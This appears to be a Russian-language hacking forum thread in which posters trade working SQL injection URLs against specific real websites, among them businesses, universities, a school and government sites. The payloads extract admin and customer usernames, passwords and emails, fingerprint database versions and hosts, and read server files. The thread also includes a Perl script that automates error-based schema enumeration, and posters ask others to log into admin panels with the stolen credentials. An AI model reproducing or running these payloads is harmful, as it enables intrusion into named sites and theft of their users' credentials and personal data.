SQL Инъекции

Сайт: http://www.liveauctiontalk.com
ТИЦ: 0
PR: 3

Code:

http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,group_concat(0x0b,login_id,0x3a,password),6,7,8,9,10+from+lat_admin--+  

http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,now(),4,group_concat(0x0b,customer_id,0x3a,password,0x3a,email),6,7,8,9,10+from+lat_customer--+

version - 5.0.77
user - [email protected]
database - liveauction
os - redhat-linux-gnu

==========================================

Сайт: http://www.thebomarestaurant.com
ТИЦ: 0
PR: 1

Code:

http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+distinct+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,vfsl_mem_email)+from+vfsl_member--+  

http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+1,2,group_concat(0x0b,vfsl_adm_log_id,0x3a,vfsl_adm_pass,0x3a,vfsl_adm_email)+from+vfsl_admin--+

version - 5.0.26-standard-log
user - [email protected]
database - vfsl
os - pc-linux-gnu

==========================================

Сайт: http://ricebrokeronline.com
ТИЦ: 0
PR: 1

Code:

http://ricebrokeronline.com/cms.php?id=-3+union+select+1,2,3,group_concat(0x0b,user_name,0x3a,password),5,6,7,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)+from+administrator--+

version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBRICEBROKER
os - UNKNOWN-LINUX-GNU

==========================================

Сайт: http://e-ricelab.com
ТИЦ: 0
PR: 1

Code:

http://e-ricelab.com/cms.php?id=-4+union+select+1,2,3,group_concat(0x0b,user_name,0x3a,password),5,6,7,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)+from+administrator--+

version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBERICELAB
os - UNKNOWN-LINUX-GNU

 

http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME)+from+information_schema.tables--

 

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+concat_ws(char(58),@@version,user(),database(),@@version_compile_os),2,3,4,5+--

version : 4.1.22-log
user : u15962@localhost
database : u15962
os : portbld-freebsd6.2

ненашёл таблицу с именами юзверей только pwd

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+group_concat(pwd,0x3a+SEPARATOR+0x0b),2,3,4,5+from+users+--

есть доступ к чтению файлов

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+load_file(0x2f686f6d652f),2,3,4,5+from+users+--

 

Сайт: http://www.wifiarab.com
ТИЦ: 0
PR: 3

Code:

http://www.wifiarab.com/module.php?id=-5+union+select+concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),2--+  

http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strUsername,0x3a3a,strPassword),2+from+tbladmin--+  

http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strEmail,0x3a3a),2+from+tblemaillist--+

version - 5.0.91-log
user - [email protected]
database - wifiarab
os - unknown-linux-gnu

==========================================

И 2 блайнда =\

==========================================

Сайт: http://www.plastic-jeunesse.ru
ТИЦ: 100
PR: 4

Code:

http://www.plastic-jeunesse.ru/php/content.php?id=1041+and+substring(version(),1,1)=5--+

version - 5.x

==========================================

Сайт: http://www.urolocus.ru
ТИЦ: 450
PR: 3

Code:

http://www.urolocus.ru/php/content.php?id=219+and+substring(version(),1,1)=5--+

version - 5.x

 

http://www.torus.com.au/index.php?page=games&id=-53+union+select+1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user+where+user=char(119,119,119)

user() : www@localhost

version() : 5.0.77

database() : website

OS: красная шапочка

File_priv : Y

PR-4

 

Это за хоккей

Code:

http://www.bma.cz/forum/forum.php?id=-4+union+sele ct+1,concat_ws(0x3a,v ersion(),database(),user()),3,4,5,6--

Database Version : 4.1.21-log
Database name : bma_cz
User : bma_cz@localhost
OS : pc-linux-gnu

----------------------------------------

Code:

http://www.drsteiner.cz/en/detail.php?id=-32+union+select+1,concat_ws(0x3a,version(),database(),us er( )),3,4,5,6,7,8,9,10,11,12,13,14,15--

Database Version : 5.0.32-Debian_7etch12-log
Database name : drsteiner
User : [email protected]
OS : pc-linux-gnu

Логин и пасс в админку детские

----------------------------------------

Code:

http://www.schnauzer.cz/chst_raz.php?id=-4+union+select+1,concat_ws(0x3a,version(),databa se(),us er()),3,4,5,6,7,8,9,10,11--

Database Version : 4.0.24'-Max'-log
Database name : schnauzercz
User : schnauzercz@thor
OS : mandrake-linux-gnu

 

Code:

http://www.zou.ru/popup.php?id=-1184+union+select+concat_ws(0x3a,database(),version(),user()),2,3+from+users%20--

Database: 111
Version: 5.5.0-m2-community
User: zou@localhost
PR: 4
ТИЦ: 300

нашёл пароли, но не могу найти админку. гляньте, может кому повезёт.

 

Code:

http://lostandlonesome.com.au/release_detail.php?desc=bart-&amp-friends-make-you-blush&id=-1+union+select+1,2,3,concat_ws(0x3a3a3a,version(),database(),user()),5,6,7--

5.0.51a-3ubuntu5.4:::lostandlonesome_new:::[email protected] 0.206.16

PR:4

 

Сайт: http://www.jazzimpuls.nl
ТИЦ: 0
PR: 5

Code:

http://www.jazzimpuls.nl/show.php?id=-79'+union+select+1,2,unhex(hex(concat_ws(0x0b,version(),user(),database(),@@version_compile_os))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+

version - 4.1.11
user - jazzimpu_root@localhost
database - jazzimpu_user
os - redhat-linux-gnu

============================================

Сайт: http://www.doctordavidclark.com
ТИЦ: 0
PR: 4

Code:

http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,group_concat(0x0b,login,0x3a,pass),8,9,10+from+ddc_admin--+  

http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,email,0x3a,pass),8,9,10+from+ddc_members--+  

http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,username,0x3a,user_password,0x3a,user_email),8,9,10+from+ddc_users--+

version - 5.0.91-log
user - [email protected]
database - nexdoctordavidDB
os - unknown-linux-gnu

============================================

Сайт: http://www.gaycity.nl
ТИЦ: 0
PR: 3

Code:

http://www.gaycity.nl/shownw.php?id=-351'/*union*/union/*select*/select/**/1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32

============================================

Сайт: http://www.listenlive.nl
ТИЦ: 0
PR: 0

Code:

http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,unhex(hex(group_concat(0x0b,user,0x3a,password))),20,21,22,23+from+mysql.user--+  

http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,now(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,unhex(hex(group_concat(0x0b,username,0x3a,password,0x3a,email))),20,21,22,23+from+members--+

version - 5.0.37-log
user - stations@localhost
database - stations
os - unknown-linux-gnu

 

Code:

http://www.4wdsystems.com.au/index.php?id=-1+union+select+1,concat_ws(0x3a3a3a,version(),database(),user()),3,4,5,6,7,8,9,10--

PR 2

5.0.90-community-log:::wc449836_db:::wc449836_jess@localhost

 

http://www.grate.ru/index.php?cat_id=-5+union+select+group_concat(0x0b,table_name),2,3,4,5,6,7,8,9,10+from+information_schema.tables--

 

Code:

http://www.swiss.org.au/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19--

4.1.22-standard-log:::swisst db:::[email protected]

PR 4

 

едушки и все такое

PR>5

MS_ACCESS

http://www.cortland.edu/polsci/default.asp?page_id=-19+union+select+1,2,3+from+"table"

PR-6
---------------------------------
MSSQL

http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+top+1+@@version+from+information_schema.tables)--

@@version : Microsoft SQL Server 2005 - 9.00.3080.00

OS : Windows Server 2003

Platform : Intel X86

PR-6
--------------------------------
MS_ACCESS

http://www.ndus.edu/reports/details.asp?id=-245+union+select+1,username,3,4,5,6,7,8,9,10,11,12,13,14+from+"table"

PR-6
--------------------------------
MySQL

http://www.rch.org.au/plastic/edu.cfm?doc_id=-5860+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database(),@@version_compile_os),1),1),6,7+from+users/*

PR-6
--------------------------------
MSSQL
http://www.pace.edu/page.cfm?doc_id=14128&frame=news/read.cfm?id=829+or+1=@@version

PR-7
--------------------------------
MS_ACCESS

http://cooklibrary.towson.edu/getResourcesBySubject.cfm?subjectID=-77+union+select+1,2+from+"table"

PR-7
--------------------------------
http://historywired.si.edu/object.cfm?ID=123+or+1=@@version

@@version : Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Enterprise Edition

OS : Windows Server 2008 (x64)

PR-8

 

скромненько продолжу школьную тему

Code:

http://sch1265.ru/pages.php?id=-28+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5%20--

Database: sch1265_base
Version: 5.0.83-0ubuntu3
User: sch1265_sch1265@localhost

 

PR: 6

Code:

http://www.rso.cornell.edu/progressive/articles.php?id=196'+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10+LIMIT+1,1%23

PR: 6

Code:

http://news.mainemaritime.edu/articles.php?id=-26'+union+select+1,2,3,4,unhex(hex(version()))+--+

 

PR 3

Code:

http://tnt.ya1.ru/interesno/gallery.php?id=-27+union+select+1,group_concat(uname,0x3a,upasswd),3,4,5+from+users--

 

Сайт: http://agenda.gaynews.nl
ТИЦ: 0
PR: 4

Code:

http://agenda.gaynews.nl/show.php?id=17349'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63),+floor(rand(0)*2)))--+

version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32

============================================

Сайт: http://www.crew4you.nl
ТИЦ: 0
PR: 1

Code:

http://www.crew4you.nl/show.php?id=22'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+cfy_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+cr_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+dg_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+md_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+dg_clients--+&hid=0

version - 5.1.45
user - forest_music@localhost
database - forest_music
os - redhat-linux-gnu

============================================

Сайт: http://www.tekcursus.nl
ТИЦ: 0
PR: 0

Code:

http://www.tekcursus.nl/website/show.php?formid=2+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63),+floor(rand(0)*2)))--+

version - 4.1.12-standard
user - datekcursu_webdb@localhost
database - datekcursu_webdb
os - pc-linux-gnu

============================================

Устал я от этого msaccess'а, сливаю =\

============================================

Сайт: http://www.spokanemarcom.com
ТИЦ: 0
PR: 4

Code:

[B]Вывод нескольких записей с перебором:[/B]
http://www.spokanemarcom.com/news.asp?id=-99+union+select+1,(select+top+1+username%2bchr(59)%2bpassword+from+members)%2bchr(58)%2b(select+top+1+username%2bchr(59)%2bpassword+from+members+where+username%2bchr(59)%2bpassword+not+in+(select+top+1+username%2bchr(59)%2bpassword+from+members)),3,4,5,6,7,8,9,10,11+from+members%00

[B]Просто вывод с перебором:[/B]
http://www.spokanemarcom.com/news.asp?id=-99+union+select+top+1+1,username%2bchr(59)%2bpassword%2bchr(59)%2bemail,3,4,5,6,7,8,9,10,11+from+members+where+username%2bchr(59)%2bpassword%2bchr(59)%2bemail+not+in+(select+top+1+username%2bchr(59)%2bpassword%2bchr(59)%2bemail+from+members)+order+by+id%00 

============================================

+ ещё парочка сайтов с этой субд..

============================================

Сайт: http://www.martinitiles.com
ТИЦ: 0
PR: 1

Code:

http://www.martinitiles.com/item2.php?id=197+union+select+1,2,data,4,5,6+from+msysaccessobjects+where+type=1%00

============================================

Сайт: http://www.uni-bright.com
ТИЦ: 0
PR: 1

Code:

http://www.uni-bright.com/item2.php?id=167+union+select+1,2,data,4,5,6+from+msysaccessobjects+where+type=1%00

 

http://www.ahfeixi.gov.cn/include/news_view.php?ty=1&ID=-11184+union+select+1,2,concat(user(),char(58),version(),char(58),database()),4,5,6,7,8,9,10,11,12,13,14--

PR-5

 

http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+concat_ws(':',version(),database(),user(),@@version_compile_os,@@tmpdir,@@datadir)),floor(rand(0)*2)))--+

5.0.77-community-nt:mostwanted:globaluname@localhost:Win32:C:\WI...

>400 БД
> 40 таблиц tbladminuser

http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+concat_ws(':',username,password)+FROM+seodata.admin+limit+0,1),floor(rand(0)*2)))--+

http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+concat_ws(':',loginname,pass,admin)+FROM+resumex.users+limit+0,1),floor(rand(0)*2)))--+

в подарочек:

PHP:

#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua = LWP::UserAgent->new;

#my $proxy="http://xxx.xxx.xxx.xxx:port"; 
#$ua->proxy(['http','https'],$proxy);

my $i=0;
while(1)
{
 my $req = HTTP::Request->new(GET => "http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+SCHEMA_NAME+FROM+information_schema.SCHEMATA+limit+$i,1),floor(rand(0)*2)))--+");
 my $res = $ua->request($req);

 if ($res->as_string =~ /Duplicate entry(.+)for/)
 {
 open(FILE,'>>results.txt');
 print "print $i: $1\n";
 print FILE "$1\n";
 close(FILE);
 $i++;
 }
  else {last;}
}

 

www.cam-systems.ca/industry-news.php?id=99999999+union+select+1,concat(0x3a,0x3a,email,0x3a,0x3a,pass,0x3a,0x3a),3,4,5,6+from+tbl_account+limit+1,1%23

www.redebemreceber.com.br/news.php?id=999999+union+select+1,2,3,4,concat(0x3a,usuario,0x3a,senha,0x3a),6,7+from+usuarios%23

www.shereno.co.za/news.php?id=9999+union+select+1,concat(0x3a,login,0x3a,passwd,0x3a),3+from+cmsusers%23